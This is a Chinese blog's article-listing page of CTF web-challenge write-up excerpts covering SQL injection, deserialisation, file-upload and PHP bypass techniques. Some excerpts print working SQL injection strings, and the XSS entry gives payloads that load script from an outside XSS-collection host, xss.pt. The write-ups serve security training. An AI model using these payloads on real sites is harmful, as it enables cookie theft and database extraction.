- 博客(25)
- 收藏
- 关注
RSS订阅原创 [GYCTF2020]EasyThinking【TP6 + disable_functions】
文章目录TP6 任意文件操作的利用方式:disable_functions的绕过总结:参考:题目名为:[GYCTF2020]EasyThinking猜到是考ThinkPHP了,上来可以直接试试www.zip,发现果然有源码泄露先随便访问一下使页面错误从而查看版本号是TP6的版本,没审过,继续看看网站上有啥功能,发现可以注册并登录,且有一个搜索功能,搜索的结果可以查看出来,猜测这是一个被利用的功能点上网搜一下有关TP6的漏洞,看到一篇:ThinkPHP6 任意文件操作漏洞分析这是有关SESSI
2021-04-30 16:23:26
575
1
原创 [watevrCTF-2019]Pickle Store【Pickle反序列化】
文章目录Pickle反序列化简单字符类型的反序列化类的反序列化`__reduce__`命令行下输入命令:python下反弹shell一、curl+base64二、curl -d三、nc 反弹shell一进来看看Cookie处,果然又是一个sessiongAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGVi
2021-04-29 23:41:37
2143
1
原创 [BJDCTF 2nd]简单注入【Bool+Regexp注入】
这道题跟之前做的 [NCTF2019]SQLi 十分相像,不过之前写的盲注脚本不大好,没有区分大小写文章目录Regexp注入布尔盲注脚本首先fuzz一下,主要过滤了union、select 、单引号、双引号、if、=、like但是值得庆幸空格、or、注释符 没被过滤(虽然过滤了也能绕)本题有个hint可以通过robots.txt发现Only u input the correct password then u can get the flagand p3rh4ps wants a girl f
2021-04-28 17:28:01
457
原创 [BJDCTF2020]EzPHP
前言:这道题很有意思,知识点多但都不是特别难的知识点,代码虽然多但都是 ”分段“ 的。总之做完真的学到很多文章目录前言:一、`$_SERVER['QUERY_STRING']`的绕过二、`%0a`绕过正则三、同名变量下`$_REQUEST`的优先级四、绕过文件内容读取的比较五、 sha1()函数的绕过六、 `create_function()`代码注入读取另外一个文件取反绕过 + 伪协议读源码define + fopen ()+fgets ()总结首先在源码中有一段GFXEIM3YFZYGQ4A=,这
2021-04-27 22:48:30
892
1
原创 Linux中/proc/目录的学习
environ:表示为该程序所设置的环境变量。maps:列出了进程所使用的库,有点长。。status:包含了进程状态一般信息(text格式)stat和statm:以一连串数字的形式提供进程内存消耗的信息fd:文件夹内有一连串数字文件,表示文件描述符,都是符号链接,链接到对应的文件。cwd:是个符号链接,对应到工作目录exe:是个符号链接,对应到可执行二进制文件root:指向当前进程根目录/proc 目录中包含许多以数字命名的子目录,这些数字表示系统当前正在运行进程的进程号(PID),里面.
2021-04-26 23:16:51
1418
2
原创 [b01lers2020]Welcome to Earth(python)
考察:写脚本又来一道考察编写python脚本的题目。。当然也可以不用python编写一开始反转就是不断地抓包看源码,最后到/fight/这里时:就是对些字符串进行全排列,不过很明显pctf{hey_boys是开头,以}结尾的itertools.permutations():就是返回可迭代对象的所有数学全排列方式itertools.permutations()它以任意迭代作为参数,并始终返回生成元组的迭代器。它没有(也不应该)特殊的字符串。要获得字符串列表,您可以自己加入元组:list(ma
2021-04-25 22:36:54
757
原创 [NCTF2019]SQLi(Regexp注入)
文章目录分析Regexp注入盲注脚本总结:又是一道考验写python脚本的题目,python学的真不咋地,看师傅们的脚本才知道一些点改怎么写…分析查询语句:sqlquery : select * from users where username='' and passwd=''一开始真的尝试很多感觉不好绕,后来意识到前面username处可以用反斜杠将SQL语句的单引号转义,再之后就没头绪了,因为实在过滤了很多,之后尝试了看看有没有hint信息,在robots.txt处找到,提示看hint.
2021-04-25 21:44:51
831
1
原创 [SWPUCTF 2018]SimplePHP【Phar:// + 文件上传】
文章目录Phar:// 协议进行反序列化构造POP链生成phar总结:一道不算难的反序列化+文件上传题目,但自己在构造POP链时还是愣了好久,本菜鸡名副其实了首先是在查找文件处,URL明显是值得怀疑的file.php?file=这按照惯例得试试能不能把一些文件读出来一共是这些:index.php、base.php、file.php、upload_file.php、class.phpupload_file.php值得关注就是这个限制了,只允许图片在file.php中就有对象的生成//file.
2021-04-24 18:35:29
1891
2
原创 [SUCTF 2019]EasyWeb【chdir()绕过open_basedir】
文章目录异或绕过正则方法一:phpinfo()方法二:`.htaccess`配合`php://filter`用python文件上传:open_basedir:利用chdir()绕过总结:<?phpfunction get_the_flag(){ // webadmin will remove your upload file every 20 min!!!! $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']); if
2021-04-24 13:59:33
549
1
原创 [GYCTF2020]Ezsqli(Mysql逐位比较)
前言用到异或注入、bool盲注,这题我感觉最重要的还是理解mysql是如何比较字符串的 与利用 逐位比较 来配合盲注文章目录前言`sys.schema_table_statistics_with_buffer`查表mysql字符串 逐位比较大小总结这题关键过滤了union 、if 、sleep与 information,当然常规的or 和 and也是过滤了的一开始看到 if 和sleep被过滤了就没有往延时注入、union注入上想异或注入就成了我的首选!测试一下id=1 ^ 1# Error
2021-04-23 20:01:36
606
1
原创 [HITCON 2017]SSRFme
文章目录pathinfo()perl脚本GET的使用open存在命令执行访问VPS写下木马文件总结:172.16.128.254 <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
2021-04-22 23:43:01
444
原创 [RCTF2015]EasySQL
前言:又是一道二次注入的题目。本菜鸡还是没有独立做出来,对二次注入这个知识点还是有些不熟练。一开始先去注册,但发现即使自己正常填信息也不能注册成功,然后懒就没想着去Fazz一下。然后折腾好一会,当我直接只填写username而不填写password、email时发现注册成功。服了,当时心态有点不好吧…当尝试username为admin"然后再去改密码时出现了报错,说明是双引号闭合,而不是常规的单引号闭合,二次注入的利用点在修改密码的username处,username即为我们注册的username
2021-04-22 11:26:02
388
原创 [网鼎杯 2018]Comment
前言:这是一道蛮有意思的题目,首先是有关Git的一些命令自己基本不懂,再之这是一道SQL二次注入的题目,可以通过读取/etc/passwd文件的方式追溯flag文件,长见识的一道题文章目录前言:Git源码泄露git的一些基础命令源码分析利用方式/etc/passwd的字段解释:Git源码泄露提示git源码泄露,用工具也确实能得到一个php文件,但文件内容不完整,这里卡住不会操作了,看师傅们是git log --relog恢复日志,然后git reset --hard e5b2a2443c2b6d3
2021-04-21 23:03:16
496
2
原创 [CISCN2019 华北赛区 Day1 Web5]CyberPunk
文章目录文件包含、`php://filter`读源码:分析源码二次注入 联合 报错注入:后言:文件包含、php://filter读源码:在index.php中,查看一些网页源码。提示?file=?,可以猜到应该是文件包含,尝试GET传参即可读取到,用php://filter读取?file=php://filter/convert.base64-encode/resource=index.php读取index.php、change.php、delete.php、search.php、confirm
2021-04-21 17:24:44
227
原创 [CISCN2019 总决赛 Day2 Web1]Easyweb
文章目录源码泄露:分析源码SQL盲注文件上传——短标签源码泄露:常规访问一下robots.txt。发现有提示bak备份文件,但没有明确是哪一个文件。这里我按照常规做法尝试index.php.bak没成功,然后一直在哪乱试,脑子wat了居然没去看网页源码,还是太菜了。其实图片就来自于image.php,自然是该文件了…访问image.php.bak下载到源码分析源码//config.php<?phpinclude "config.php";$id=isset($_GET["id"])?
2021-04-20 19:30:07
323
原创 [FBCTF2019]RCEService
文章目录前言:一、非多行模式下%0a换行绕过二、利用PCRE回溯次数限制绕过前言:一道需要绕过preg_match()的CTF题目,如何绕过 preg_match() ?这题一看就知道使用打命令的了,但啥也没给啊??无奈先试试ls的命令{"cmd":"ls"}发现是有回显的,然后尝试cat读取就不行了…尝试ls根目录也不行无奈啊~向WP妥协了…然后看到别人说有源码,what?哪来的…没搞懂。那就直接看源码吧<?phpputenv('PATH=/home/rceservice
2021-04-20 16:45:32
300
原创 无字母数字RCE与LD_PRELOAD绕disable_functions
<?phperror_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); }
2021-04-19 23:34:50
1271
原创 ThinkPHP5.0中的MVC学习
文章目录ThinkPHP5.0框架目录:URL访问规则:更改访问入口文件的URL:新建模块:新建控制器(Controller):新建模型(Model)新建视图(View)MVCmvc的运行流程:ThinkPHP5.0框架目录:project 应用部署目录├─application 应用目录(可设置)│ ├─common 公共模块目录(可更改)│ ├─index 模块目录(可更改)│ │ ├─config.php
2021-04-15 22:44:58
1126
1
原创 熊海审计
熊海审计一、文件包含漏洞0x01:%00截断截断大概可以在以下情况适用:include(require)file_get_contentsfile_exists截断条件:php版本小于5.3.4 详情关注CVE-2006-7243php的magic_quotes_gpc为OFF状态error_reporting(1); //关闭错误显示$file=addslashes($_GET['r']); //接收文件名$action=$file==''?'index':$file; //判
2021-04-15 00:10:04
193
原创 Think PHP3.2.3 update(blind)注入
前言:第一次尝试TP框架的代码审计,搭环境的过程有点坎坷…但勉勉强强还是完成了。原本以为审计起来不会太吃力,审计完才发现自己对工业化的代码框架认知程度远远不够,所以整个过程都比较艰辛,整理出来的东西还是不够清晰明了,下次再接再厉。坚持下去,死磕吧。┭┮﹏┭┮Think PHP3.2.3 update(blind)注入漏洞简述尽管ThinkPHP 3.2.x使用了 I 方法来过滤参数,但是还是过滤不严谨,导致SQL注入发生。ThinkPHP 3.2.3 目录结构下载框架后,解压缩到web目录下面
2021-04-14 13:32:59
385
1
原创 CTFshow——sqli-labs
草率地记录一下1——字符型id=-1' union select 1,database(),(select group_concat(flag) from ctfshow.flag )-- -2——数字型?id=-1 union select 1,database(),(select group_concat(flagac) from ctfshow.flagaa )-- -(select group_concat(table_name) from information_schema.ta
2021-04-10 21:06:50
1306
原创 DASCTF 3月赛Web
BestDB$sql = "SELECT * FROM users WHERE id = '$query' OR username = \"$query\"";题目过滤了单引号和空格,因为这条语句的特殊,我们可以利用双引号在后面部分进行闭合。空格就用/**/查列数:1"/**/order/**/by/**/3#1"/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.
2021-04-08 17:32:08
883
1
原创 CTFshow——代码审计
文章目录web301——SQL注入web301——SQL注入web303——报错注入web304——报错注入web305——web306——web307——web301——SQL注入将源码下载下来。主要看checklogin.php:$sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;";$result=$mysqli->query($sql);$row=
2021-04-07 17:46:39
1507
1
原创 [极客大挑战 2019]FinalSQL
前言:记录一道SQL注入题,用到了异或注入,确认过眼神,是我没掌握的知识点异或有两种: ^ 和 xor ^ 是前后进行二进制层面的异或运算xor 是逻辑上的异或操作,对前后两个逻辑真假进行异或最简单的两个例子:MariaDB [test]> select 1^1;+-----+| 1^1 |+-----+| 0 |+-----+MariaDB [test]> select 1^0;+-----+| 1^0 |+-----+| 1 |+-----+Ma
2021-04-03 16:18:04
182
原创 CTFshow——XSS
文章目录web316web317——过滤了scriptweb318——过滤了imgweb319——web320、321、322——过滤空格web316利用xss平台里的代码进行攻击: https://xss.pt/xss.php<sCRiPt sRC=//xss.pt/kUIB></sCrIpT>web317——过滤了script<img src=x onerror=s=createElement('script');body.appendChild(s);s.sr
2021-04-01 18:38:04
622
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人